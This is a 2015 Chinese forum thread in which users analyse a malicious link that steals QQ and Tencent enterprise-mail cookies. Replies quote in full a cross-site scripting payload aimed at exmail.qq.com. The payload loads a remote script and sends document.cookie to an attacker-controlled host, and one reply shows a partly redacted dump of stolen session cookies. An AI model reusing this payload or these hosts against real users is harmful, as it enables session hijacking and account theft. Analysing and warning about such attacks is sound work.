This topic created in 3833 days ago, the information mentioned may be changed or developed.
http://eeee.washbowl.com.cn/
这个是个挂马地址,请各位大师分析一下
如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?
Supplement 1 · Nov 2, 2015
有什么信息可以追踪到写这个 scirpt 的人么...这个网站的主机和 DNS 是?
Supplement 2 · Nov 3, 2015
提醒:不要用 IPHONE 打开浏览器链接!!!!!!!!
 |
2
jedyu Nov 2, 2015
手贱点了进去,一堆信息被上传了
|
 |
7
WenJimmy Nov 2, 2015
不敢点
|
|
8
jedyu Nov 2, 2015
@saxon
c=wxstaytime=1423741712; idqq_account=theCanChange=1; theShowUin=145xxxxxx; [email protected]; EmailCanSeach=1; EmailIsActive=1; UinCanSeach=1; shouldshowmail=1; firstsetidqq=1; MSK=0;; verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba; qz_gdt=m6uqgvwxxxxxxq4ezk4ka; qqmusic_uin=; qqmusic_key=; qqmusic_fromtag=; new_mail_num=14xxxxxx8&1; qm_flag=0; [email protected]; sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.; biz_username=261xxxxxx; CCSHOW=0000; username=140761208&1403227908|-16342184644&261233652; ssl_edition=b31.exmail.qq.com; Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx; Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx; _ga=GA1.3.1469923463.1445309872; qm_username=14xxxxxx; qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.; RK=CEeuCexxGR; pt_clientip=133b3c0cxxxxxx4f; pt_serverip=b7ff0abfxxxxxx60; pt2gguin=o0014xxxxxx; uin=o0014xxxxxx; skey=@uF8W0XXXc; ptisp=cnc; ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985; pgv_info=ssid=s776441213&pgvReferrer=; pgv_pvid=775212126; o_cookie=14xxxxxx; uid=12xxxxxx; dc_vplaying=0; tinfo=14xxxxxx.0000*; wimrefreshrun=0&; autologin=n &u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html |
 |
10
kikyous Nov 2, 2015
<script>
function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); </script> 谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的? |
 |
11
laydown Nov 2, 2015
我没看正文直接点了,我要不要重装系统啊?!!!
|
 |
12
soolby Nov 2, 2015
定期改一下密码复杂一点。
把你的提示问题的答案设置的复杂一点(记得备份) |
 |
13
aliuwr Nov 2, 2015
估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。 @laydown 速度改 QQ 密码就好了。 |
 |
16
skyun Nov 2, 2015
手贱。直接点进去了。。。
|
 |
17
wgf2008 Nov 2, 2015
D 它
|
 |
18
ScotGu Nov 2, 2015
既然这个网站可以直接获取 cookies
那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。 看来用邮件客户端很有必要啊。 |
 |
19
Tuibimba Nov 2, 2015 via Android
我的 iphone 被偷了后也收到过这类链接
点进去后发现不对劲 立马把相关密码都改了 |
 |
20
BOYPT Nov 2, 2015
 在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊 |
 |
21
wdlth Nov 2, 2015  1
用的阿里云……
|
 |
22
wohenyingyu01 Nov 2, 2015
网址点进去后发现是个新闻网站。。。
|
 |
23
Evi1m0 Nov 2, 2015
@BOYPT
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。 另外一个 iframe 是进行攻击者的操作: <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe> <iframe src="/htmlpage5.html" style="display:none"></iframe> --------------- function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); document.domain="qq.com"; window.onload=documentrrady; function documentrrady(){ window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer) }; |
|
24
BOYPT Nov 2, 2015
比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了??
|
|
25
skyun Nov 2, 2015
吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧?
|
 |
26
Sleebi Nov 2, 2015
这次还好忍住了,先看评论,保命
|
|
27
Evi1m0 Nov 2, 2015
嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
|
 |
29
yksoft1 Nov 2, 2015
用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事
|
 |
30
ChoateYao Nov 2, 2015
难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。
|
 |
32
saxon OP @wohenyingyu01 并不是 只是挂了一个 iframe
|
 |
33
RHFS Nov 2, 2015
你还是提醒一下别人别乱点链接吧。。。
我觉得很多人点玩看了评论都吓到了 |
 |
34
curiosity Nov 2, 2015
我擦...点开了...有什么补救方法嘛!
|
|
35
Evi1m0 Nov 2, 2015 1
|
 |
38
DevineRapier Jul 8, 2016
@kikyous web 第一课: cookie 在本地, session 在服务器
|
Select Language